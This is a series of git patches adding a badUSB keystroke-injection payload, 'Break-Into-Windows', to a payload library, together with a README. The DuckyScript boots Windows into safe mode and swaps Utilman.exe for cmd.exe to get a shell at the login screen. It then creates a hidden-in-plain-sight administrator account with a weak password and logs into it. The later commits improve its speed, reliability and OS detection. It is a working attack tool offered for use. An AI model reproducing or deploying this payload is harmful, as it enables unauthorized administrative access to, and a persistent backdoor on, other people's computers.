From d23274874d772e906cab3146f31460e64c5923ae Mon Sep 17 00:00:00 2001 From: Tzur Soffer Date: Fri, 27 Dec 2024 18:18:11 -0800 Subject: [PATCH 1/5] added WindowsPasswordBypass --- .../general/Break-Into-Windows/README.md | 20 +++ .../general/Break-Into-Windows/payload.txt | 115 ++++++++++++++++++ 2 files changed, 135 insertions(+) create mode 100644 payloads/library/general/Break-Into-Windows/README.md create mode 100644 payloads/library/general/Break-Into-Windows/payload.txt diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md new file mode 100644 index 000000000..113adb75e --- /dev/null +++ b/payloads/library/general/Break-Into-Windows/README.md @@ -0,0 +1,20 @@ + +## Disclaimer + +This script is provided "as is" without any warranty of any kind, either express or implied. The use of this script is at your own risk. The author is not responsible for any damage or loss of data that may occur as a result of using this script. By using this script, you agree to these terms. + +## About: +A badUSB script that gains full admin access to a windows machine from the login screen. + +## Important Note: +This script currently only works on computer with one account. + +### How it works: +1. It boots into safe mode +2. It opens a cmd from safe mode +3. It changes the Utilman.exe to be a cmd.exe +4. It boots back into windows +5. It opens the help menu which has been replaced with a cmd instance +6. It creates a new admin account named ```rubberDucky``` with the password ```1234``` +7. it Reboots again, to register the new account +8. It logs into the new account \ No newline at end of file diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt new file mode 100644 index 000000000..93c3aa57f --- /dev/null +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -0,0 +1,115 @@ +REM Title: Example Payload +REM Author: Tzur Soffer +REM Description: Break into Windows 10 + 11 +REM Target: Windows 10, Windows 10 +REM Props: Hak5, Darren Kitchen, Korben +REM Version: 1.1 +REM Category: General + +REM get into safe mode +STRING QQQQQQQQQ +DELAY 3000 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 100 +UP +DELAY 200 + +HOLD SHIFT +DELAY 200 +HOLD SPACE +DELAY 100 +RELEASE SPACE +DELAY 100 +ENTER +RELEASE SHIFT + +DELAY 60000 +REM ADD CMD to login page +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 1000 +TAB +DELAY 50 +ENTER +DELAY 1000 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 1000 +REM replace utilman.exe with cmd.exe + +REM Check each drive from C: to G: for Utilman.exe +STRING @echo off +ENTER +STRING setlocal enabledelayedexpansion +ENTER +STRING for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( +ENTER +STRING if exist %d:\Windows\System32\Utilman.exe ( +ENTER +STRING echo Utilman.exe found in drive %d: +ENTER +STRING cd /d %d:\Windows\System32\ +ENTER +STRING ) +ENTER +STRING ) +ENTER +STRING copy Utilman.exe Utilman2.exe +ENTER +STRING copy cmd.exe Utilman.exe /y +ENTER + +STRING exit +ENTER +DELAY 1000 +ENTER +DELAY 60000 + +REM go into shell from login page +STRING QQQQQQQQQ +DELAY 3000 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 1000 + +REM create new admin acount +STRING net user rubberDucky 1234 /add +ENTER +STRING net localgroup administrators rubberDucky /add +ENTER +STRING shutdown /r /t 0 +ENTER +DELAY 45000 + +REM login to new user +STRING QQQQQQQQQ +DELAY 3000 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 500 +STRING 1234 +ENTER \ No newline at end of file From 21a93fcdb980625361ec3afc703c4fb05ed73ed4 Mon Sep 17 00:00:00 2001 From: Tzur Soffer Date: Fri, 27 Dec 2024 19:08:42 -0800 Subject: [PATCH 2/5] Windows Password Bypass: Massive improvements to speed and reliability --- .../general/Break-Into-Windows/README.md | 3 --- .../general/Break-Into-Windows/payload.txt | 26 +++++++++---------- 2 files changed, 12 insertions(+), 17 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md index 113adb75e..7c709b728 100644 --- a/payloads/library/general/Break-Into-Windows/README.md +++ b/payloads/library/general/Break-Into-Windows/README.md @@ -6,9 +6,6 @@ This script is provided "as is" without any warranty of any kind, either express ## About: A badUSB script that gains full admin access to a windows machine from the login screen. -## Important Note: -This script currently only works on computer with one account. - ### How it works: 1. It boots into safe mode 2. It opens a cmd from safe mode diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 93c3aa57f..948def4a6 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -1,22 +1,17 @@ -REM Title: Example Payload +REM Title: Windows Password Bypass REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 1.1 +REM Version: 2.0 REM Category: General REM get into safe mode STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT TAB -DELAY 50 -TAB -DELAY 50 -TAB -DELAY 50 -TAB -DELAY 50 +RELEASE SHIFT ENTER DELAY 100 UP @@ -82,12 +77,11 @@ DELAY 60000 REM go into shell from login page STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT TAB DELAY 50 TAB -DELAY 50 -TAB -DELAY 50 +RELEASE SHIFT ENTER DELAY 1000 @@ -96,19 +90,23 @@ STRING net user rubberDucky 1234 /add ENTER STRING net localgroup administrators rubberDucky /add ENTER -STRING shutdown /r /t 0 +STRING shutdown /l ENTER -DELAY 45000 +DELAY 10000 REM login to new user STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT +TAB +DELAY 50 TAB DELAY 50 TAB DELAY 50 TAB DELAY 50 +RELEASE SHIFT ENTER DELAY 500 STRING 1234 From 0f80f9524fa62c92717d0043ca551bc6064ca9e6 Mon Sep 17 00:00:00 2001 From: Tzur Soffer <103438808+TzurSoffer@users.noreply.github.com> Date: Wed, 1 Jan 2025 19:26:36 -0800 Subject: [PATCH 3/5] Works on logged in and logged out machines --- payloads/library/general/Break-Into-Windows/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 948def4a6..a8a6bb934 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -8,6 +8,7 @@ REM Category: General REM get into safe mode STRING QQQQQQQQQ +CTRL ALT DELETE DELAY 3000 HOLD SHIFT TAB @@ -110,4 +111,4 @@ RELEASE SHIFT ENTER DELAY 500 STRING 1234 -ENTER \ No newline at end of file +ENTER From 0ff0b0087931409b0878435c960c8f53a4a36de9 Mon Sep 17 00:00:00 2001 From: Tzur Soffer Date: Tue, 7 Jan 2025 14:46:34 -0800 Subject: [PATCH 4/5] Update coding style + README.md --- .../general/Break-Into-Windows/README.md | 16 ++++-- .../general/Break-Into-Windows/payload.txt | 53 ++++++++----------- 2 files changed, 35 insertions(+), 34 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md index 7c709b728..baede3cd4 100644 --- a/payloads/library/general/Break-Into-Windows/README.md +++ b/payloads/library/general/Break-Into-Windows/README.md @@ -3,15 +3,25 @@ This script is provided "as is" without any warranty of any kind, either express or implied. The use of this script is at your own risk. The author is not responsible for any damage or loss of data that may occur as a result of using this script. By using this script, you agree to these terms. +### If you found [this repository](https://github.com/TzurSoffer/WindowsPasswordBypasser) useful, please give it a ⭐!. + +## Showcase + +[Watch showcase video on youtube](https://www.youtube.com/shorts/1XvC-QQdRzU) + ## About: A badUSB script that gains full admin access to a windows machine from the login screen. +**IMPORTANT NOTE**: This only works on machines with a local account; if you use an account connected to Microsoft, this will not work! + +## Note for pico-ducky +You might have to remove the following line as its not supported by the pico-ducky, but worry, the code should work just fine without it. ```EXTENSION PASSIVE_WINDOWS_DETECT``` + ### How it works: -1. It boots into safe mode +1. It reboots into safe mode 2. It opens a cmd from safe mode 3. It changes the Utilman.exe to be a cmd.exe 4. It boots back into windows 5. It opens the help menu which has been replaced with a cmd instance 6. It creates a new admin account named ```rubberDucky``` with the password ```1234``` -7. it Reboots again, to register the new account -8. It logs into the new account \ No newline at end of file +7. It logs into the new account diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index a8a6bb934..90021c2f5 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -3,9 +3,15 @@ REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 2.0 +REM Version: 2.1 REM Category: General +DEFINE #ACCOUNT_PASSWORD 1234 +DEFINE #ACCOUNT_NAME rubberDucky + +REM wait for Windows to accept keystrokes +EXTENSION PASSIVE_WINDOWS_DETECT + REM get into safe mode STRING QQQQQQQQQ CTRL ALT DELETE @@ -48,29 +54,18 @@ DELAY 1000 REM replace utilman.exe with cmd.exe REM Check each drive from C: to G: for Utilman.exe -STRING @echo off -ENTER -STRING setlocal enabledelayedexpansion -ENTER -STRING for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( -ENTER -STRING if exist %d:\Windows\System32\Utilman.exe ( -ENTER -STRING echo Utilman.exe found in drive %d: -ENTER -STRING cd /d %d:\Windows\System32\ -ENTER -STRING ) -ENTER -STRING ) -ENTER -STRING copy Utilman.exe Utilman2.exe -ENTER -STRING copy cmd.exe Utilman.exe /y -ENTER +STRINGLN @echo off +STRINGLN setlocal enabledelayedexpansion +STRINGLN for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( +STRINGLN if exist %d:\Windows\System32\Utilman.exe ( +STRINGLN echo Utilman.exe found in drive %d: +STRINGLN cd /d %d:\Windows\System32\ +STRINGLN ) +STRINGLN ) +STRINGLN copy Utilman.exe Utilman2.exe +STRINGLN copy cmd.exe Utilman.exe /y -STRING exit -ENTER +STRINGLN exit DELAY 1000 ENTER DELAY 60000 @@ -87,12 +82,9 @@ ENTER DELAY 1000 REM create new admin acount -STRING net user rubberDucky 1234 /add -ENTER -STRING net localgroup administrators rubberDucky /add -ENTER -STRING shutdown /l -ENTER +STRINGLN net user #ACCOUNT_NAME #ACCOUNT_PASSWORD /add +STRINGLN net localgroup administrators #ACCOUNT_NAME /add +STRINGLN shutdown /l DELAY 10000 REM login to new user @@ -110,5 +102,4 @@ DELAY 50 RELEASE SHIFT ENTER DELAY 500 -STRING 1234 -ENTER +STRINGLN #ACCOUNT_PASSWORD From ab865a1039a72c785f938b7879c211edd3b4ed39 Mon Sep 17 00:00:00 2001 From: Tzur Soffer <103438808+TzurSoffer@users.noreply.github.com> Date: Tue, 7 Jan 2025 18:47:33 -0800 Subject: [PATCH 5/5] Fixed PASSIVE_WINDOWS_DETECT --- .../general/Break-Into-Windows/payload.txt | 25 ++++++++++++++++--- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 90021c2f5..18c78cfa9 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -3,14 +3,31 @@ REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 2.1 +REM Version: 2.2 REM Category: General -DEFINE #ACCOUNT_PASSWORD 1234 -DEFINE #ACCOUNT_NAME rubberDucky - REM wait for Windows to accept keystrokes EXTENSION PASSIVE_WINDOWS_DETECT + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF +END_EXTENSION + +DEFINE #ACCOUNT_PASSWORD 1234 +DEFINE #ACCOUNT_NAME rubberDucky REM get into safe mode STRING QQQQQQQQQ